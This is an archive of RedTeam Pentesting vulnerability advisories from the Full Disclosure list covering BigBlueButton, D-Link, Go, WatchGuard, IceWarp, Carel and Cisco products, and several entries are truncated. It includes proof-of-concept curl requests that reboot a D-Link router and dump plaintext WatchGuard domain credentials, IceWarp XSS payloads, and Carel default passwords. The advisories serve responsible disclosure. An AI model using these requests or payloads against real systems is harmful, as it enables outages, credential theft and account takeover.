[FD] [RT-SA-2020-005] Arbitrary File Disclosure and Server-Side Request Forgery in BigBlueButton

2020-10-21 Thread RedTeam Pentesting GmbH
 exploit this vulnerability, attackers need to have access to a
conference with the ability to upload presentations. While successful
exploitation of this vulnerability would pose severe consequences for
the affected BigBlueButton instance, it is only rated to pose a medium
risk due to the requirement of having presentator access.


Timeline


2020-09-11 Vulnerability identified
2020-09-18 Customer approved disclosure to vendor
2020-09-22 CVE ID requested
2020-09-22 CVE ID assigned
2020-09-24 Requested encrypted communication with vendor
2020-09-25 Vendor unable to provide encrypted communication,
   Vendor notified
2020-09-25 Vendor confirmed being able to reproduce vulnerability,
   mentioned similar bugreport
2020-09-25 Requested information whether "similar burgreport"
   uses the same vulnerability - no answer
2020-10-13 Again requested information whether "similar burgreport"
   uses the same vulnerability, whether release shedule is
   known - no answer
2020-10-14 Vendor released fixed version (without mentioning vulnerability)
2020-10-21 Vulnerability published by third party [7]
2020-10-21 Advisory released


References
==

[1] 
https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton
[2] http://opendocumentformat.org/
[3] https://www.w3.org/TR/xlink11/
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
[5] https://docs.bigbluebutton.org/dev/api.html#usage
[6] https://docs.bigbluebutton.org/support/faq.html#presentations
[7] 
https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2020-003] FRITZ!Box DNS Rebinding Protection Bypass

2020-10-19 Thread RedTeam Pentesting GmbH
7-08 Vendor notified
2020-07-20 Vendor provided fixed version to RedTeam Pentesting
2020-07-23 Vendor notified of another problematic IP
2020-08-06 Vendor provided fixed version to RedTeam Pentesting
2020-10-06 Vendor starts distribution of fixed version for selected devices 
2020-10-19 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2020-002] Denial of Service in D-Link DSR-250N

2020-10-08 Thread RedTeam Pentesting GmbH
Advisory: Denial of Service in D-Link DSR-250N

RedTeam Pentesting discovered a Denial-of-Service vulnerability in the
D-Link DSR-250N device which allows unauthenticated attackers in the
same local network to execute a CGI script which reboots the device.


Details
===

Product: D-Link DSR-250N
Affected Versions: 3.12 and potentially later
Fixed Versions: 3.17B
Vulnerability Type: DoS
Security Risk: low
Vendor URL: 
https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002
Advisory Status: published
CVE: CVE-2020-26567
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567


Introduction


"The D-Link Wireless N Unified Service Router (DSR-250N) provides
enhanced security, functionality and performance over a traditional VPN
router without the complexity of a full firewall solution. The D-Link
Wireless N Unified Service Router is a cost-effective, high performance
solution for securing a small business network."

(from the vendor's homepage)


More Details


During a penetration test, the firmware for the D-Link DSR-250N router
was downloaded from D-Links official website[1] and extracted for
further analysis. It was then confirmed that CGI scripts exist on the
router that can be directly accessed with a web browser, without any
authentication. In particular, the script "upgradeStatusReboot.cgi"
executes the command to reboot the device. Its contents are:


#!/bin/sh
echo Content-type: text/plain
echo ""
stat=`/sbin/reboot -d 8 &`
echo $stat


Executing this script renders the device unusable for the time of the
reboot. In tests, it turned out that the device needs roughly four
minutes to complete a reboot. As a consequence, any network using the
device as a switch or router is not accessible during that time, too.

In the penetration test, the router's web interface was available
directly over the Internet. According to the vendor, the web interface
is by default disabled for the WAN interface.


Proof of Concept


An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will
reboot the device:


$ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi



Workaround
==

Access to the D-Link DSR-250N's web interface should only be enabled for
administrators, for example by only allowing access from specific IP
addresses in the firewall. Access over the WAN interface should also be
disabled if it was enabled manually.


Fix
===

A preview firmware version named 3.17B which should correct the issue
was received at the end of September from the vendor. RedTeam Pentesting
was not able to verify the fix due to lack of access to a test device.
However, the formerly accessible CGI script is no longer part of the
firmware.


Security Risk
=

No authentication is needed to excute the CGI script and thereby reboot
the device. Attackers might abuse this behaviour for targeted
denial-of-service-attacks against  D-Link customers, since rebooting the
device interrupts access to networks relying on this device for routing
or switching purposes. However, the attack is only possible if the
attacker resides on the same network, and no further information can be
gathered or control over the devices be obtained. Therefore, the
vulnerability is rated as a low risk.


Timeline


2020-06-29 Vulnerability identified
2020-07-03 Customer approved disclosure to vendor
2020-07-03 Requested security contact from vendor via web formular
2020-07-03 Vendor replied with contact information
2020-07-07 Advisory provided to vendor
2020-09-28 Vendor provided fixed version to RedTeam Pentesting
2020-10-05 CVE ID requested
2020-10-06 CVE ID assigned
2020-10-08 Advisory released


References
==

[1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are 

[FD] [RT-SA-2020-004] Inconsistent Behavior of Go's CGI and FastCGI Transport May Lead to Cross-Site Scripting

2020-09-02 Thread RedTeam Pentesting GmbH
8001
HTTP/1.1 200 OK
Content-Type: image/png
[...]

PNG[...]



Workaround
==

Applications should explicitly set a Content-Type via the Header().Set()
method of the ResponseWriter interface. The relevant code from the
sample application mentioned above then looks like this:


handler := http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {
w.Header().Set("Content-Type", "image/png")
w.Write(image)
})



Fix
===

The CGI and FastCGI implementations of the ResponseWriter interface should
behave as documented and infer the Content-Type from the response data. This
was implemented in Go versions 1.14.8 and 1.15.1 (the patch can be found here
[7]).


Security Risk
=

The risk of this vulnerability heavily depends on the concrete
application at hand. If it depends on the documented behavior and is
accessed via CGI or FastCGI and provides attackers a means to request
data they can influence, this may lead to a cross-site scripting
vulnerability.

When other users of the same application request the attackers' data,
the embedded JavaScript code is executed and the attackers can interact
with the web application in the user's name, display arbitrary content
within the user's browser, and observe the user's interaction with the
web application.

Considering the severe consequences and the requirements for
exploitation (serving via CGI/FastCGI instead of HTTP), this
vulnerability is rated as a medium risk.


Timeline


2020-08-07 Vulnerability identified
2020-08-10 Vendor notified
2020-08-10 Vendor acknowledges receipt of report
2020-08-14 Vendor confirms security issues
2020-08-20 Vendor announces plans for a minor release of Go
2020-09-01 Vendor releases new version of Go, issue[6] is #40928, patch[7]


References
==

[1] https://pkg.go.dev/net/http/?tab=doc#ResponseWriter
[2] https://pkg.go.dev/net/http/httptest?tab=doc#ResponseRecorder
[3] https://mimesniff.spec.whatwg.org/
[4] 
https://github.com/golang/go/blob/ba9e10889976025ee1d027db6b1cad383ec56de8/src/net/http/cgi/child.go#L196-L199
[5] 
https://github.com/golang/go/blob/ba9e10889976025ee1d027db6b1cad383ec56de8/src/net/http/fcgi/child.go#L112-L114
[6] https://github.com/golang/go/issues/40928
[7] https://go-review.googlesource.com/c/go/+/252179/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2020-001] Credential Disclosure in WatchGuard Fireware AD Helper Component

2020-03-13 Thread RedTeam Pentesting GmbH
Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component

RedTeam Pentesting discovered a credential-disclosure vulnerability in
the AD Helper component of the WatchGuard Fireware Threat Detection and
Response (TDR) service, which allows unauthenticated attackers to gain
Active Directory credentials for a Windows domain in plaintext.


Details
===

Product: WatchGuard Fireware AD Helper Component
Affected Versions: 5.8.5.10233, < 5.8.5.10317
Fixed Versions: 5.8.5.10317
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"Threat Detection and Response (TDR) is a cloud-based subscription
service that integrates with your Firebox to minimize the consequences
of data breaches and penetrations through early detection and automated
remediation of security threats."

"Threat Detection and Response includes the AD Helper component. If your
network has an Active Directory server, you can install AD Helper to
manage automated installation and updates of Host Sensors on your
network."

(from the vendor's homepage)


More Details


By accessing the AD Helper's web interface, it was discovered that a
call to an API endpoint is made, which responds with plaintext
credentials to all configured domain controllers. There is no
authentication needed to use the described interface and the
installation instructions at [1] contain no indication of any way to
configure access control.


Proof of Concept


An HTTP GET request to the path "/domains/list" of the AD Helper
API returns, among others, the plaintext credentials to
all configured Windows domain controllers:


$ curl --silent 
"http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName=asc;
 | jq .

{
  "content": [
{
  "id": 1,
  "fullyQualifiedName": "example.com",
  "logonDomain": "example.com",
  "domainControllers": "dc1.example.com",
  "username": "[DOMAIN_USER]",
  "password": "[DOMAIN_PASSWORD]",
  "uuid": "[...]",
  "servers": [
{
  [...]
}
  ]
}
  ],
  "totalPages": 1,
  "totalElements": 1,
  "number": 0,
  "numberOfElements": 1
}


The same request and its response can be observed when initially accessing
the web interface. The discovered version of AD Helper responds with
the following server banner:


jetty(winstone-5.8.5.10233-9.4.12.v20180830)


It is likely that other versions of the AD Helper Component are
vulnerable as well.


Workaround
==

Ensure API of the AD Helper Component is not reachable over the network,
for example by putting it behind a Firewall.


Fix
===

Update to Version 5.8.5.10317 or later.


Security Risk
=

No authentication is needed to access AD Helper's web interface and the
installation instructions at [1] describe that configured domain user
accounts must possess at least the following privileges:

 * Connect to the host
 * Mount the share ADMIN$
 * Create a file on the host
 * Execute commands on the host
 * Install software on the host

Access to the "ADMIN$" share implies a user with administrative
privileges. Therefore, this vulnerability poses a high risk.


Timeline


2020-02-12 Vulnerability identified
2020-02-19 Customer approved disclosure to vendor
2020-02-24 Tried to contact the German branch of WatchGuard
2020-02-27 Contacted the Dutch branch of WatchGuard
2020-02-28 Contact to ADHelper QA Team Lead established
2020-03-02 Advisory draft sent for verification
2020-03-10 Vendor released fixed version and blog post
2020-03-11 CVE ID requested
2020-03-11 Advisory released


References
==

[1] 
https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants 

[FD] [RT-SA-2019-016] IceWarp: Cross-Site Scripting in Notes

2020-01-02 Thread RedTeam Pentesting GmbH
Advisory: IceWarp: Cross-Site Scripting in Notes

During a penetration test, RedTeam Pentesting discovered that the
IceWarp WebMail Server is prone to cross-site scripting attacks in notes
for objects. If attackers with access to the IceWarp system provide a
manipulated object that is displayed by users, they can run arbitrary
JavaScript code in the users' browsers.

Details
===

Product: IceWarp WebMail Server
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well
Fixed Versions: IceWarp 12.2.1.1
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: http://www.icewarp.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-016
Advisory Status: published
CVE: CVE-2019-19266
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19266

Introduction


"Secure professional email with own domain and revolutionary integration
with chat. Shared calendars for perfect planning."
(from the vendor's homepage)


More Details


Users can create, modify and share appointments in IceWarp with other
users of the web application. Especially noteworthy are the following
two XML Entities in the request to create a new appointment:


text/html
h1;RedTeam Pentesting/h1;


These define a note for an appointment. It was found that in notes some
HTML entities were rendered, but some entities and attributes were
filtered. However, the filter only takes effect when the content type of
the note is set to "text/html". When the content type is left out or set
to any other type, the filter is not active, enabling attackers to
circumvent the filter and execute JavaScript in the user's browser. The
same is true for notes attached to other objects, such as files or
tasks.

Just using the calendar module, at least three ways to attack other
IceWarp users are available using cross-site scripting in a note of an
appointment:

 * Inviting other attendees to an appointment
 * Sharing access to an appointment
 * Sending a calendar file as a request via email

Especially for the first variant of attacking an IceWarp user by adding
that user to a manipulated appointment, no user interaction is required
from the attacked user besides opening the IceWarp calendar.

Proof of Concept


Create an appointment using an HTTP request similar to the following:


POST /[...]/webmail/server/webmail.php HTTP/1.1
Host: icewarp.example.com
Content-Type: text/xml


  

  

  
Example Appointment
0


U

img style=display: none; src=x 
onerror=alert(RedTeam Pentesting)
0
Z
<_tzevnstartdate>2458801
<_tzevnenddate>2458801
<_tzevnstarttime>660
<_tzevnendtime>690
<_tzid>Europe/Amsterdam
60
  

  

  




Workaround
==

None known.


Fix
===

Update to IceWarp 12.2.1.1.


Security Risk
=

Attackers with access to an IceWarp account could give other legitimate
IceWarp users access to manipulated objects. If the attacked user opens
the preview of such an object, for example by just opening the calendar,
a cross-site scripting vulnerability can be exploited. That could, for
example, be used to display a fake login form and get access to the
user's credentials, or to access any data stored in IceWarp such as
emails, contacts, tasks, files or appointments. While this requires an
attacker with access to an IceWarp account, this kind of access could be
gained by exploiting the vulnerability described in rt-sa-2019-15 [1].
This is considered to pose a high risk.


Timeline


2019-11-11 Vulnerability identified
2019-11-15 Vendor notified
2019-11-22 Customer approved disclosure
2019-11-25 CVE number requested
2019-11-25 CVE number assigned
2019-12-02 Vendor released fixed version
2019-12-10 Customer approved disclosure
2019-12-13 Fixed version released
2020-01-02 Advisory released


References
==

[1] https://www.redteam-pentesting.de/advisories/rt-sa-2019-015


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More

[FD] [RT-SA-2019-015] IceWarp: Cross-Site Scripting in Notes for Contacts

2020-01-02 Thread RedTeam Pentesting GmbH
Advisory: IceWarp: Cross-Site Scripting in Notes for Contacts

During a penetration test, RedTeam Pentesting discovered that the
IceWarp WebMail Server is prone to user-assisted cross-site scripting
attacks in its contact module. If IceWarp users import a manipulated
vcard, for example from an email, attackers can run arbitrary JavaScript
code in the users' browsers.


Details
===

Product: IceWarp WebMail Server
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well
Fixed Versions: IceWarp 12.2.1.1
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: http://www.icewarp.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-15
Advisory Status: published
CVE: CVE-2019-19265
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19265

Introduction


"Secure professional email with own domain and revolutionary integration
with chat. Shared calendars for perfect planning."
(from the vendor's homepage)


More Details


IceWarp allows users to import contacts in vcard format [1] from emails.
These contacts can contain HTML notes as can be seen by exporting notes
created by IceWarp. The following line shows such a note:


X-ALT-NOTE;FMTTYPE=text/html:RedTeam Pentesting


By inserting JavaScript here, a cross-site scripting vulnerability can
be exploited if an IceWarp user imports such a manipulated contact into
IceWarp. The property handling for the HTML formatted note "X-ALT-NOTE"
and "FMTTYPE" is not defined in the vcard [1] standard, but is borrowed
from the calendar file format ical [2]. Originally, the vcard standard
uses the property "NOTE". This field can be used to exploit a cross-site
scripting in IceWarp, too.


Proof of Concept


Send an IceWarp user one of the following vcards:


BEGIN:VCARD
VERSION:4.0
FN:Pentesting\, RedTeam
N:Pentesting;RedTeam;;;
X-ALT-NOTE;FMTTYPE=text/html:
EMAIL;TYPE=INTERNET,PREF:testus...@example.com
END:VCARD


or


BEGIN:VCARD
VERSION:4.0
FN:Pentesting\, RedTeam
N:Pentesting;RedTeam;;;
NOTE:
EMAIL;TYPE=INTERNET,PREF:testus...@example.com
END:VCARD



Workaround
==

None known.


Fix
===

Update to IceWarp 12.2.1.1.


Security Risk
=

Attackers without an account on the IceWarp system can send specially
crafted vcard [1] files to IceWarp users. If an IceWarp user imports
that new contact into the IceWarp web application a cross-site scripting
vulnerability can be exploited. That could, for example, be used to
display a fake login form and get access to the user's credentials, or
to access any data stored in IceWarp such as emails, contacts, tasks,
files or appointments. Access to these could be abused to exploit the
vulnerability described in rt-sa-2019-016 [3].
This is considered to pose a high risk.


Timeline


2019-11-11 Vulnerability identified
2019-11-15 Vendor notified
2019-11-22 Customer approved disclosure
2019-11-25 CVE number requested
2019-11-25 CVE number assigned
2019-12-02 Vendor released fixed version
2019-12-10 Customer approved disclosure
2019-12-13 Fixed version released
2020-01-02 Advisory released


References
==

[1] https://tools.ietf.org/html/rfc6350
[2] https://tools.ietf.org/html/rfc2445
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2019-16


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/


-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen



[FD] [RT-SA-2019-014] Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC

2019-10-31 Thread RedTeam Pentesting GmbH
 notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13549


References
==

[0] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-013.txt
[1] http://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf
[2] https://www.metasploit.com/
[3] https://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient
[4] 
https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2019-013] Unsafe Storage of Credentials in Carel pCOWeb HVAC

2019-10-31 Thread RedTeam Pentesting GmbH
lash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel



Workaround
==

Change all default passwords listed above and ensure the user "nobody"
is disabled or has a password set.
The Carel pCOWeb card should not be connected to networks accessible by
untrusted users (compare advisory rt-sa-2019-014[1]).


Fix
===

No updated firmware will be published for pCOWeb Cards, as they are
obsolete since Dec 2017. A successor hardware with current firmware is
available for OEM integrators.


Security Risk
=

Attackers with knowledge of one set of user credentials to a Carel
pCOWeb card could use the password hashes accessible to all users in
"/etc/passwd" or the plaintext copies of the passwords to gain
different privileges. Due to the necessity of access to credentials,
this is considered to pose a low risk only.


Timeline


2019-07-17 Vulnerability identified
2019-08-03 Customer approved disclosure to vendor
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13553


References
======

[0] 
https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0
[1] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=====

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2019-012] Information Disclosure in REDDOXX Appliance

2019-07-01 Thread RedTeam Pentesting GmbH
-

It provides details about the used license (serial number replaced by
random value for demonstration purposes):


{
  "version": "1.1",
  "id": "{----}",
  "result": {
"License": {
  "Activated": true,
  "ActivationDate": "2000-01-01T12:34:56",
  "ApplianceID": "1234",
  "ArchiveLicenses": "1",
  "Cluster": false,
  "Customer": "Example Ltd.",
  "HasFullMaildepotLicense": true,
  "HasFullSpamfinderLicense": true,
  "HasMaildepotPremiumLicense": true,
  "MailDepotImporterLicense": false,
  "MailSealerLicenses": "1",
  "MailSealerSignatureLicense": false,
  "MsxAgentLicenses": "1",
  "SerialNumber": "AIP1-EECA-EUKI-E6AH-OOGH-EI5Y",
  "ServiceDate": "1899-12-30T00:00:00",
  "SpamfinderLicenses": "1",
  "SubscriptionDate": "2020-01-30T12:34:56",
  "Valid": true,
  "VirusScan": true
}
  }
}



Workaround
======

None


Fix
===

Install the latest hotfixes for the appliance, see [2].


Security Risk
=

The risk of the information disclosure through the two API calls is
estimated to be low. Although the API calls should not be available
without authentication, "CoreService.GetRealmList" will only return
rudimentary information about the authentication realms and
"CoreService.GetLicense" is mostly a problem for the vendor, as the
serial number could be misused to set up a licensed application without
paying.


Timeline


2019-05-21 Vulnerability identified
2019-05-24 Customer approved disclosure to vendor
2019-06-04 Vendor notified
2019-06-05 Vendor acknowledges the vulnerability
2019-06-17 Vendor released hotfix
2019-06-24 Customer approved release
2019-07-01 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] 
https://appliance.docs.reddoxx.com/de/release-notes/release-notes-version-2032-service-pack-2-2-2-1242


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/


-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2019-002] Directory Traversal in Cisco Expressway Gateway

2019-05-17 Thread RedTeam Pentesting GmbH
closure for May 1st to RedTeam Pentesting
2019-05-01 Vendor publishes advisory
2019-05-16 Customer approves release of this advisory
2019-05-17 Advisory released


References
==
[1] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvo47769
[2] 
https://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html
[3] 
https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Orange%20Tsai%20-%20Updated/DEFCON-26-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-and-Pop-0days-Out-Updated.pdf
[4] https://tomcat.apache.org


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2019-005] Cisco RV320 Command Injection Retrieval

2019-03-27 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Command Injection

RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router which
was inadequately patched by the vendor.


Details
===

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 through 1.4.2.20
Fixed Versions: none
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Vendor Status: working on patch
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-005
Advisory Status: published
CVE: CVE-2019-1652
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652


